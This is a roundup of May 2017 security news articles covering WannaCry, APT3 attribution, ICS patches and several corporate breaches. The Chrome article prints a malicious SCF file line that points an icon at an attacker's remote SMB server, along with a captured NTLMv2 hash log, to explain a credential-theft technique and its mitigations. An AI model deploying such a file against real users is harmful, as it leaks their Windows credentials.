Hopefully, the launch of a public bug bounty program will streamline vulnerability reporting to avoid the disclosure of unpatched flaws by researchers who are frustrated with the lack of communication.


Ukraine's Presidency Says Website Attacked by Russia

18.5.2017 securityweek Hacking
The Ukrainian presidency said its website had been attacked by Russia in apparent retaliation for Kiev's decision to block prominent Moscow-based social networks.

"We have been witnessing the Russian response to the president's decree about closing access to Russian social networks," President Petro Poroshenko's deputy administration chief Dmytro Shymkiv said in a statement posted late Tuesday on Facebook.

"The president's website has sustained an organised attack."

Shymkiv added that IT specialists had the situation under control and that the website was no longer under threat. It was accessible on Wednesday in Kiev.

Kremlin spokesman Dmitry Peskov called Kiev's accusations unfounded.

"The absence of anything concrete (in Ukraine's claim) once again confirms the absolute baselessness of such accusations," Peskov told reporters.

IT specialists and Western governments are rarely able to pin a hacking attack directly on the Kremlin but often accuse groups or individuals close to the Russian government of being responsible for them.

Ukraine on Tuesday blocked Russia's most popular social media networks and an internet search engine in response to the Kremlin's backing of a three-year separatist war in the east and annexation of Crimea in March 2014.

The decision sparked an outcry from Ukrainian internet users and freedom of speech advocates.

"In a single move Poroshenko dealt a terrible blow to freedom of expression in Ukraine," Human Rights Watch researcher Tanya Cooper said.

"It's an inexcusable violation of Ukrainians' right to information of their choice," she said in a statement Wednesday.

It also sowed confusion among Ukraine's internet providers about how precisely such a ban would work.

The Internet Association of Ukraine sent a letter to Poroshenko and top government agencies asking how it should proceed since the former Soviet republic had no laws setting guidelines for blocking traffic to specific websites.

Several of the banned Russian social media sites published instructions to their users explaining how they could circumnavigate the ban by using open-access internet technologies.


APT3 Hackers Linked to Chinese Ministry of State Security

18.5.2017 securityweek APT
Independent researchers and experts from threat intelligence firm Recorded Future are confident that the cyber espionage group tracked as APT3 is directly linked to the Chinese Ministry of State Security (MSS).

While much of the security community typically tries to avoid making attribution statements, arguing that false flags make this task difficult, there are some individuals and companies that don’t shy away from accusing governments of conducting sophisticated cyberattacks.

A mysterious group called “intrusiontruth,” which claims to focus on investigating some of the most important advanced persistent threat (APT) actors, has recently published a series of blog posts on APT3, a group that is also known as UPS Team, Gothic Panda, Buckeye and TG-0110.

The cyberspies, believed to be sponsored by China, have been active since at least 2009, targeting many organizations in the United States and elsewhere via spear-phishing, zero-day exploits, and various other tools and techniques. Researchers noticed last year that APT3 had shifted its attention from the U.S. and the U.K. to Hong Kong, where it had mainly targeted political entities using a backdoor dubbed “Pirpi.”

Intrusiontruth has conducted an analysis of APT3’s command and control (C&C) infrastructure, particularly domain registration data. Their research led to two individuals, named Wu Yingzhuo and Dong Hao, who apparently registered many of the domains used by the threat actor.

Both these individuals are listed as shareholders for a China-based security firm called the Guangzhou Boyu Information Technology Company, or Boyusec. In November 2016, the Washington Free Beacon learned from Pentagon intelligence officials that this company had been working with Chinese telecoms giant Huawei to develop spyware-laden security products that would be loaded onto computers and phones. The unnamed officials said Boyusec was “closely connected” to the Chinese Ministry of State Security.

Intrusiontruth concluded that either Boyusec has two shareholders with the same name as members of APT3, or Boyusec is in fact APT3, which is the more likely scenario.

Recorded Future has dug deeper to find more evidence connecting APT3 to China’s MSS. In a report published on Wednesday, the company said it had attributed the group directly to the MSS with “a high degree of confidence.”

Researchers pointed out that in addition to Huawei, which claimed to use Boyusec for security evaluations of its corporate intranet, Boyusec was also a partner of the Guangdong Information Technology Security Evaluation Center (Guangdong ITSEC), and the organizations have been collaborating on an active defense lab since 2014.

Guangdong ITSEC is apparently a subordinate of the China Information Technology Evaluation Center (CNITSEC), which, according to academic research, is run by the Ministry of State Security.

Experts believe many of the ministry’s subordinates, particularly ones at provincial and local levels, have legitimate public missions and act as a cover-up for intelligence operations.

“Companies in sectors that have been victimized by APT3 now must adjust their strategies to defend against the resources and technology of the Chinese government. In this real-life David vs. Goliath situation, customers need both smart security controls and policy, as well as actionable and strategic threat intelligence,” Recorded Future said in its report.


Schneider Patches Flaws in VAMPSET, SoMachine Products

18.5.2017 securityweek Vulnerebility
Updates released by Schneider Electric for its VAMPSET and SoMachine HVAC products patch several medium and high severity vulnerabilities that can be exploited for denial-of-service (DoS) attacks and arbitrary code execution.

Advisories describing the flaws were published recently by both ICS-CERT and Schneider Electric.

One of the advisories focuses on a medium severity memory corruption vulnerability affecting VAMPSET, a piece of software used to configure and maintain protection relays and arc flash protection units. The bug, tracked as CVE-2017-7967, can be triggered using a specially crafted settings file (.vf2).

“This vulnerability causes the software to halt or not start when trying to open the corrupted file,” Schneider wrote in its advisory. “As Windows operating system remains operational and VAMPSET responds, it is able to be shut down through its normal closing protocol.”

According to Fortinet’s Kushal Arvind Shah, the researcher who reported the flaw to the vendor, an attacker may also be able to exploit the weakness for arbitrary code execution.

The flaw has been addressed with the release of VAMPSET 2.2.189. All previous versions are affected.

Separate advisories describe two high severity vulnerabilities found by independent researchers in Schneider’s SoMachine HVAC product, a programming software for Modicon logic controllers. Both security holes have been patched with the release of SoMachine HVAC 2.2.

One of the flaws, CVE-2017-7966, has been described as a DLL hijacking issue that can be exploited by a remote, unauthenticated attacker to execute arbitrary code by planting a malicious library that would get executed instead of the legitimate file.

The second vulnerability, classified as a stack-based buffer overflow and tracked as CVE-2017-7966, is related to a component named AlTracePrint.exe. Schneider and ICS-CERT have not shared any details, but mentioned that the component can be called in a way that leads to a buffer overflow and a crash.

Last month, researchers from Germany-based OpenSource Security disclosed a couple of critical vulnerabilities in Schneider’s Modicon and SoMachine products before the vendor released patches.

The experts reported the flaws to the company in December and decided to make their findings public after not receiving any feedback. Schneider admitted making a mistake and promised to release fixes in mid-June.


What's Driving Stress Levels of Security Operations Teams?

18.5.2017 securityweek Security
Security Operations Teams Are Overwhelmed by Vulnerabilities and Volume of Threat Alerts, Study Finds

One of the reasons the WannaCrypt ransomware spread so far and so fast is because it leveraged what was for some Windows users a 0-day exploit, and for others an n-day exploit. For users of unsupported Windows version, it was 0-day -- there had been no patch. But for many users of supported versions of Windows, it was an n-day exploit; that is, the exploit was used during the variable-n number of days between a patch being issued by Microsoft, and the patch being implemented by the user.

N-day exploits are an increasing problem because, if anything, the time between issue and implementation of patches is increasing.

A new study, prepared for Bay Dynamics by EMA and published today, helps to explain why this is happening. Bay Dynamics, a maker of cyber risk analytics software, completed a $23 million Series B financing round in July 2016.

Four hundred security professionals ranging from management to operational staff in mid-market, enterprise and very large enterprise organizations and representing a wide range of industry sectors were questioned about stress in their daily lives.

What emerged, in a nutshell, is that operations staff are overwhelmed by the sheer volume of vulnerabilities; they are falling behind in efforts to remediate them; and tend to under-report the problem to their seniors.

To put this into context, on average, a mid market firm might have 10 full time staff servicing ten new vulnerabilities per month across just under 2,000 assets (almost 20,000 vulnerabilities to service every month). For a very large enterprise those figures translate to 100 staff servicing more than 1.3 million vulnerabilities every month. Seventy-four per cent of security teams admit they are overwhelmed by the volume of maintenance work required.

Since full and timely patching is an impossibility, security teams are required to prioritize their efforts -- but this is also a problem. Nearly 80% of the respondents admitted that their patching approval process is significantly manual. "This," notes the report, "included emails, spreadsheets, and other electronic documents for tracking and approval. With the volumes of patching that have to be reviewed, these labor intensive manual steps drive high inefficiencies and stress."

To be fair, 'too many vulnerabilities' is not considered to be the primary stress driver for security teams. It ties in second place (at 21%) with stress caused by management, one point behind the primary cause of stress, 'not enough manpower'. The report postulates that security teams "are creating a security facade around their security program maturity. This could be a natural extension of what they are conveying to their upper management."

If this is true, it would go a long way to explain the often-discussed disparity between operations staff and senior management over the maturity of an organization's security posture: senior management invariably claims a more mature posture than that reported by security operations.

The survey also makes clear that the prioritization of vulnerabilities and threats is also problematic. Sixty-eight percent of respondents prioritize vulnerabilities based on their severity. This severity is relatively easy to gauge from the vendor's alert and the IT infrastructure. Threats, however, are a little different.

Fifty-eight respondents prioritize vulnerabilities based on the severity of identified threats -- but 52% of threat alerts are improperly prioritized by systems and must be manually reprioritized.

"While severity of alerts should be a key indicator of how both vulnerabilities and threats should be prioritized for action by operations," suggests the report, "it is not the only factor and should not be considered the primary indicator unless the prioritization algorithm has sufficient context within its framework."

The problem here is that the majority of current alerting systems, such as SIEMs, do not usually provide sufficient context for automatic priority decision-making. Newer machine-learning anomaly detection systems have the potential, eventually, to provide better and more complete context; but for now, they are known to create a high level of false positives.

The difficulty in being able to automatically and correctly prioritize vulnerabilities is delaying their solution. Analysts are spending between 24 and 30 minutes investigating each alert; and are falling behind. Sixty-four percent of alert tickets are not worked per day, and analysts are continuously falling further behind in their workload -- explaining why 'dwell time' for breaches is over six months.

There are two possible solutions. The first is more manpower -- but given the sparsity of suitable security analysts, this would be difficult. The second is automation through better security tools.

"To succeed," suggests the report, "tools must be made smarter by providing more useful context around the technical, financial, and behavioral aspects of the incidents. This will reduce the number of false positives and misclassified alerts so that only the real, most critical threats are at the top of the investigation pile." If this can be achieved, "a day in the life of a security pro will become significantly less stressful." And the next WannaCrypt perhaps a little less successful.


WannaCry Ransomware Creators Make Rookie Mistake

18.5.2017 securityweek Ransomware
WannaCry Ransomware Didn't Utilize Trackable Bitcoin Wallets

A bug in the WannaCry ransomware prevented the malicious application from generating individual Bitcoin wallets to collect payments from each of its victims, security researchers have discovered.

WannaCry began wreaking havoc worldwide on May 12, courtesy of a worm component abusing the NSA-linked EternalBlue exploit. Targeting an already addressed Windows SMB vulnerability, the exploit allowed an otherwise typical run-of-the-mill ransomware to become an international threat within hours.

An earlier WannaCry version appears connected to North Korean threat group Lazarus, but the variant used in the still ongoing campaign has nothing out of the ordinary, researchers say. In fact, researchers have already discovered bugs in the malware's code, although the encryption routine hasn’t been cracked as of now.

In a recent tweet, Symantec Security Response reveals that a race condition bug prevented the malware from using a unique Bitcoin address for every victim. The issue resulted in the ransomware using only three wallets for collecting ransom payments, which prevents its operators from tracking the payments to specific victims.

Follow
Security Response ✔ @threatintel
#WannaCry has code to provide unique bitcoin address for each victim but defaults to hardcoded addresses as a result of race condition bug
5:35 PM - 16 May 2017
308 308 Retweets 211 211 likes
Twitter Ads info & Privacy
Security experts have warned countless of times against paying the ransom in the event of a ransomware attack, as making payment does not guarantee that files would be restored. When it comes to the WannaCry attack, it is unlikely that victims would get their files back after paying the ransom.

More than 260 payments have been made to the three Bitcoin addresses associated with the ransomware, allowing the crooks to collect an estimated $78,000 to date from this campaign alone.

According to a recent tweet from Symantec, WannaCry attackers released a version that fixed the Bitcoin bug soon after the original variant, but most infections contain the flaw. However, the attempt to resolve the bug shows that the hackers’ “main goal was to make money,” the security firm says.

Patches, malware and kill-switch slowed the infection

Over 200,000 computers are estimated to have been hit by the ransomware, but that number could have been much higher if it wasn’t for several conditions, starting with the fact that the attack unfolded heading into a weekend, when many vulnerable computers were offline. Microsoft issuing an emergency patch to address the flaw in older Windows versions also helped.

In a rather strange twist of events, a crypto-currency mining botnet that has been spreading using the very same vulnerability might have limited WannaCry’s infection as well. Dubbed Adylkuzz, the botnet blocks SMB networking immediately after infection, thus preventing other malware from compromising the machine using EternalBlue.

More importantly, a great deal of attacks were stopped because security researcher @MalwareTechBlog registered a domain the ransomware would beacon to before starting the infection. The domain acts as a kill-switch, as the malware terminates its process when receiving a response from it. A WannaCry variant with no kill-switch was also observed, apparently patched in a hex editor.

While that variant was supposedly the work of the same cybercriminals, because no change was made to the hardcoded Bitcoin wallets, newer samples feature different addresses, Bitdefender senior e-threat analyst Bogdan Botezatu told SecurityWeek. These variations are believed to come from different crooks and they too were patched on the fly (not recompiled), Botezatu said.

Hundreds of thousands vulnerable and no free decryptor

The kill-switch domain also works as a sinkhole, and data gathered from it reveals that the WannaCry attacks are ongoing, with over 300,000 infections stopped over the past 24 hours, a live tracker shows. The number includes repeated incidents involving the same individual machines, but the number of vulnerable devices is believed to be in the hundreds of thousands range.

“We find that there are over 1 million internet-connected devices that expose SMB on port 445. Of those, over 800,000 run Windows, and — given that these are nodes running on the internet exposing SMB — it is likely that a large percentage of these are vulnerable versions of Windows with SMBv1 still enabled (other researchers estimate up to 30% of these systems are confirmed vulnerable, but that number could be higher),” Rapid7’s Roy Hodgman says.

Because of the encryption implementation in WannaCry, decrypting files for free isn’t possible at the moment, although there might be tools claiming they can restore users’ data, Symantec says. The malware uses two hardcoded public keys, one for demo decryption purposes, and another for the main encryption process.

“Once the malware is running on the victim machine it will generate a new unique RSA 2048 bit asymmetric key pair. This means that each victim needs their own decryption key,” the security firm notes.

After generating the new key pair, the malware exports the public RSA key to a local file, then exports the private RSA key and encrypts it with the hardcoded attacker public key, after which it stores it in another file on disk. Next, it destroys the private key in memory and, because “the lifetime of private victim RSA keys is so limited there is no good option to recover it later once the encryption has happened,” Symantec says.

Because not all files are encrypted using the victim’s RSA public key, for which the private key has been securely encrypted and stored locally, there are tools that can restore some of the victims’ files. According to Symantec, however, only some of the files are actually decryptable.

Some files are recoverable

The good news, however, is that some files can be recovered, especially on older Windows XP versions. While the malware overwrites files stored in Desktop, My Documents, or on any removable disks in the computer at the time of the infection and then deletes them, thus preventing undelete or disk recovery tools from restoring them, it doesn’t do the same for files stored outside these three locations.

For the rest of locations, the malware moves the files to a temporary folder and then normally deletes them, without overwriting them using a wiper. This means that files might be recoverable, but “the recovery ratio may vary from system to system because the deleted file may be overwritten by other disk operations,” Symantec says.

On Windows XP versions SP1 and SP2, because of a pseudo-random number generator (PRNG) vulnerability addressed in Windows XP SP3, one could “predict encryption keys that would be created in the future and, crucially, reveal keys that had been generated in the past.” By exploiting the flaw, an individual could reveal the decryption key in memory, but only if WannaCry is still running.


Over 200 Brooks Brothers Stores Hit by Payment Card Breach

18.5.2017 securityweek Hacking
U.S. clothing retailer Brooks Brothers, which operates more than 400 stores worldwide, informed customers last week that cybercriminals had access to its payment processing systems for nearly one year.

According to the company, attackers installed malware designed to capture payment card data at many of its retail and outlet locations. While the organization does not store card data, the malware intercepted information as it passed through its systems.

Customers who made purchases at certain Brooks Brothers locations in the U.S. and Puerto Rico between April 4, 2016, and March 1, 2017, may have had their payment card information stolen. The exposed information includes names, credit and debit card numbers, card expiration dates, and verification codes. However, not all transactions were affected.

The retailer pointed out that social security numbers or other personally identifiable information was not compromised in the breach. It also noted that online transactions were not at risk, and Brooks Brothers airport locations were not impacted.

Brooks Brothers has set up a web page that lists all the impacted locations in each state. More than 220 stores are listed, with a majority in California, Florida, Massachusetts, New Jersey, New York, North Carolina, Pennsylvania and Texas.

The company is confident that the malware has been removed from its systems. Law enforcement has been alerted and experts have been called in to investigate the incident and assist with remediation efforts.

Brooks Brothers has provided some advice on what potentially affected customers can do to protect themselves against payment card fraud, but pointed out that it cannot be certain whether any particular individual is affected, which is why it will not call or email anyone regarding the breach. It’s not uncommon for scammers to take advantage of such incidents to trick people into handing over personal and financial information.

Customers who have concerns or questions can call 888-735-5927 between 9:00 AM and 9:00 PM ET, Monday through Friday.

Brooks Brothers is not the only major clothing retailer to suffer a data breach recently. Last year, Eddie Bauer informed customers that its payment processing systems had been infected with malware for more than six months.


CISCO start assessing its products against the WannaCry Vulnerability
18.5.2017 securityaffairs Ransomware

The tech giant Cisco announced an investigating on the potential impact of WannaCry malware on its products.
Recent massive WannaCry ransomware attack highlighted the importance of patch management for any organization and Internet users.

Another Tech giant, Cisco announced it is investigating the potential impact of WannaCry malware on its products, especially on its solutions that can’t be patched to fix the flaw exploited by the malware.

It is an important initiative started by the company that intends to protect its customers with the assessment of its products.

The Cisco Product Security Incident Response Team (PSIRT) announced the investigation on Monday.

“The Cisco PSIRT Team is continuing to investigate the impact of this vulnerability on Cisco products that have not reached end of software maintenance support and that do not support automated or manual updates of the Microsoft patch for these vulnerabilities. Investigation is expected to be completed by Friday, May 19th.” states the announcement. “Currently no products have been found to prevent the automatic or manual installation of the MS17-010 patches or not function properly with the MS17-010 patches applied.”

According to CISCO’s announcement, its experts will investigate the impact of the MS17-010 bug on products that don’t support either manual or automated update.

CISCO WannaCry flaw

The company aims to discover products that can’t be fixed.

“Currently no additional guidance other than to apply the Microsoft patches or disable SMBv1 is applicable.” continues the advisory.

CISCO published Snort rules (42329-42332, 42340, 41978) and a Cisco IPS (Intrusion Prevention System) signature pack to mitigate the threat and block WannaCrypt traffic.

Let’s hope that also other IT vendors that ship products running Windows OS will start the assessment of their products.


DocuSign Data Breach Led to Targeted Email Malware Campaign
17.5.2017 thehackernews Virus
While we all were busy in the WannaCry ransomware menace, two separate data breaches have been reported, one in DocuSign, a major provider of electronic signature technology, and another in BELL, Canada’s largest telecommunications company.
In a notice on its website on Tuesday, DocuSign confirmed a breach at one of its email systems when investigating the cause of an increase in DocuSign-impersonating phishing emails.
"A malicious third party had gained temporary access to a separate, non-core system that allows us to communicate service-related announcements to users via email," DocuSign said in the announcement.
What Happened?
An unknown hacker or group of hackers managed to breach one of the electronic signature technology provider's email systems and steal a database containing the email addresses of DocuSign customers.
The attackers then used the stolen data to conduct an extensive phishing campaign to target the DocuSign's users over the past week.
The phishing email masqueraded as documents sent from another company with the subject line "Completed *company name* – Accounting Invoice *number* Document Ready for Signature," needing a digital signature from the recipient.
The emails, sent from domains including dse@docus.com, included a downloadable Microsoft Word document, which when clicked, installs "macro-enabled-malware" on the victim's computers.
What type of information?
The company said only email addresses of its customers had been accessed in the breach.
However, DocuSign assured its customers that no names, physical addresses, passwords, social security numbers, credit card information or any other information had been accessed by the attackers.
"No content or any customer documents sent through DocuSign's eSignature system was accessed; and DocuSign's core eSignature service, envelopes and customer documents, and data remain secure," the company stressed.
How many victims?
The number of victims affected by the phishing campaign has not been confirmed, but DocuSign encourages its customers to use the DocuSign Trust Center to help them protect themselves and their employees from phishing attacks.
"Right now we are still acting on the results of our ongoing investigation and cannot comment on those details," the company said.
What is DocuSign doing?
In an attempt to protect its customers, DocuSign has immediately restricted unauthorized access to its system and placed further security controls in place to hardened the security of its systems.
The company is also actively working with law enforcement authorities on the investigation of this matter.
What should DocuSign customers do?
DocuSign recommended its users to delete any email with the following subject line:
Completed: [domain name] – Wire transfer for recipient-name Document Ready for Signature
Completed: [domain name/email address] – Accounting Invoice [Number] Document Ready for Signature.
If you receive any suspicious email, you should forward it to the company's spam address, advised DocuSign.
Also, if the email looks like it has come from DocuSign, just do not respond to that email or click on any link provided in the message.
Instead, access your documents directly by visiting DocuSign official website, and entering the unique security code provided at the bottom of every legit DocuSign email.
The company also informed its users that DocuSign never asks recipients to open any PDF, Office document or ZIP file in an email. Last but not the least, always make sure your antivirus software is up-to-date.


Beware! Hackers Can Steal Your Windows Password Remotely Using Chrome
17.5.2017 thehackernews Hacking
A security researcher has discovered a serious vulnerability in the default configuration of the latest version of Google's Chrome running on any version of Microsoft's Windows operating system, including Windows 10, that could allow remote hackers to steal user's login credentials.
Researcher Bosko Stankovic of DefenseCode has found that just by visiting a website containing a malicious SCF file could allow victims to unknowingly share their computer's login credentials with hackers via Chrome and the SMB protocol.
This technique is not new and was exploited by the Stuxnet — a powerful malware that specially designed to destroy Iran's nuclear program — that used the Windows shortcut LNK files to compromise systems.
What’s make this attack different from others is the fact that such SMB authentication related attacks have been first time demonstrated on Google Chrome publicly, after Internet Explorer (IE) and Edge.
Chrome + SCF + SMB = Stealing Windows Credentials
SCF (Shell Command File) shortcut file format works similar as LNK files and is designed to support a limited set of Windows Explorer commands that help define an icon on your desktop, such as My Computer and Recycle Bin.
"Currently, the attacker just needs to entice the victim (using fully updated Google Chrome and Windows) to visit his website to be able to proceed and reuse victim’s authentication credentials," Stankovic wrote in a blog post, describing the flaw.
Basically, shortcut links on your desktop are a text file with a specific syntax of shell code that defines the location of icon/thumbnail, application's name and it's location.
[Shell]
Command=2
IconFile=explorer.exe,3
Since Chrome trusts Windows SCF files, attackers can trick victims into visiting their website containing a maliciously crafted shortcut file, which gets downloaded automatically onto the target systems without prompting confirmation from the users.
As soon as the user opens the folder containing that downloaded file, immediately or later, this file automatically runs to retrieve an icon without the user having to click on it.
But instead of setting the location of an icon image, the malicious SCF file created by the attacker contain the location of a remote SMB server (controlled by the attacker).
[Shell]
IconFile=\\170.170.170.170\icon
So, as soon as the SCF file attempts to retrieve the icon image, it will trick into making an automatic authentication with the attacker’s controlled remote server over SMB protocol, handing over the victim's username and hashed version of password, allowing the attacker to use your credentials to authenticate to your personal computer or network resource.
"Setting an icon location to a remote SMB server is a known attack vector that abuses the Windows automatic authentication feature when accessing services like remote file shares," Stankovic said.
But following the Stuxnet attacks, Microsoft forced LNK files to load their icons only from local resources so they'd no longer be vulnerable to such attacks which make them load malicious code from outside servers.
However, SCF files were left alone.
Exploiting LM/NTLM Hash Authentication via SCF File
Exploiting LM/NTLM Hash Authentication
Image Source: SANS
But why would your Windows PC automatically hand over your credentials to the server?
If you are unaware, this is how authentication via the Server Message Block (SMB) protocol works in combination with the NTLM challenge/response authentication mechanism.
In short, LM/NTLM authentication works in 4 steps:
Windows users (client) attempts to log into a server.
The server responds with a challenge value, asking the user to encrypt the challenge value with his hash password and send it back.
Windows handles the SCF request by sending the client’s username and hashed version of the password to the server.
The server then captures that response and approves authentication, if the client's hash password is correct.
Now, in the SCF attack scenario, elaborated by Stankovic, Windows will attempt to authenticate to the malicious SMB server automatically by providing the victim's username and NTLMv2 password hashes (a personal computer or network resource) to the server, as described in above-mentioned step 3.
If the user is part of a corporate network, the network credentials assigned to the user by his company's sysadmin will be sent to the attacker.
If the victim is a home user, the victim's Windows username and password will be sent to the attacker.
[*] SMB Captured - 2017-05-15 13:10:44 +0200
NTLMv2 Response Captured from 173.203.29.182:62521 - 173.203.29.182
USER:Bosko DOMAIN:Master OS: LM:
LMHASH:Disabled
LM_CLIENT_CHALLENGE:Disabled
NTHASH:98daf39c3a253bbe4a289e7a746d4b24
NT_CLIENT_CHALLENGE:01010000000000000e5f83e06fcdd201ccf26d91cd9e326e000000000200000000000
00000000000
Bosko::Master:1122334455667788:98daf39c3a253bbe4a289e7a746d4b24:01010000000000000e5f83e06fcdd201ccf26d91cd9e326e00000000020000000000000000000000
No doubt, the credentials are encrypted but can be "brute-forced" later to retrieve original login password in plain text.
"It is worth mentioning that SCF files will appear extensionless in Windows Explorer regardless of file and folder settings," the researcher said. "Therefore, file named picture.jpg.scf will appear in Windows Explorer as picture.jpg. This adds to inconspicuous nature of attacks using SCF files."
No Need to Decrypt Password *Sometimes*
Since a number of Microsoft services accept the password in its hashed form, the attacker can even use the encrypted password to login to your OneDrive, Outlook.com, Office 365, Office Online, Skype, Xbox Live and other Microsoft services, making the decryption unnecessary.
Such vulnerabilities, according to the researcher, could also pose a serious threat to large organizations as they enable attackers to impersonate one of their members, allowing attackers to immediately reuse gained privileges to further escalate access and gain access and control of their IT resources and perform attacks on other members.
How to Prevent Such SMB Authentication-related Attacks
Simply, block outbound SMB connections (TCP ports 139 and 445) from the local network to the WAN via firewalls, so that local computers can not query remote SMB servers.
Stankovic also advises users to consider disabling automatic downloads in Google Chrome by going to Settings → Show advanced settings → and then Check the "Ask where to save each file before downloading" option.
This change will allow you to manually approve each download attempt, which would significantly decrease the risk of credential theft attacks using SCF files.
Google is aware of the vulnerability and is said to be working on a patch, but no timeframe has been given as to when the patch will be made available to the users.


Bell Canada Hacked: Data of 1.9 Million Customers Stolen
17.5.2017 thehackernews Hacking
While we all were busy in the WannaCry ransomware menace, two separate data breaches have been reported, one in DocuSign, a major provider of electronic signature technology, and another in BELL, Canada’s largest telecommunications company.
Canadian mobile phone, TV, and internet service provider Bell on Monday confirmed that the company had been hit by an unknown hacker who has managed to access its customer information illegally.
In a brief statement released by Bell Canada, the company said an unknown hacker managed to have his hands on data of millions of Bell customers.
However, the company did not mention the compromised customer details stolen in the hack were pulled from which particular service.
The company said email addresses, names and telephone numbers of its customers had been accessed in the breach.
How many victims Affected?
Bell confirmed the hack and said the unknown hacker has managed to gain access to information on nearly 2 million customers.
"The illegally accessed information contains approximately 1.9 million active email addresses and approximately 1,700 names and active phone numbers," the company said.
However, Bell assured its customers that there's no indication of hacker's access to "financial, password or other sensitive personal information," and that the incident is not linked to the global WannaCry ransomware attacks.
What's the Missing Link?
The incident seems to be an extortion attempt by a hacker or group of hackers who posted some of the stolen data of Bell Canada customers online and threatened to leak more data if the company fails to cooperate.
"We are releasing a significant portion of Bell.ca's data due to the fact that they have failed to [co-operate] with us," reads a post on PasteBin published Monday afternoon, several hours before Bell Canada released its apology.
"This shows how Bell doesn't care for its [customers'] safety and they could have avoided this public announcement… Bell, if you don't [co-operate], more will leak :)."
There is still no explanation for who is behind the extortion demand or what sort of cooperation the hackers were seeking for, but it appears Bell Canada refused to pay the ransom demand.
However, this information remains unconfirmed.
What is Bell Canada doing? The Canada's largest telecommunication said the company is working with the Canadian law enforcement authorities to figure out who was responsible for the attack.
"We apologize to Bell customers for this situation and are contacting those affected directly," the company said.
"Bell took immediate steps to secure affected systems. The company has been working closely with the RCMP cyber crime unit in its investigation and has informed the Office of the Privacy Commissioner."
What should Bell Canada customers do?
While Bell Canada believes there is "minimal risk involved for those affected" by the attack, having access to customer information, including email addresses, names and/or telephone numbers, opens the opportunity for targeted phishing attacks to customers.
So, users should particularly be alert of any phishing email, which are usually the next step of cyber criminals after a breach to trick users into giving up further details like financial information.
For the obvious reasons, all Bell Canada customers are highly recommended to change their passwords as soon as possible.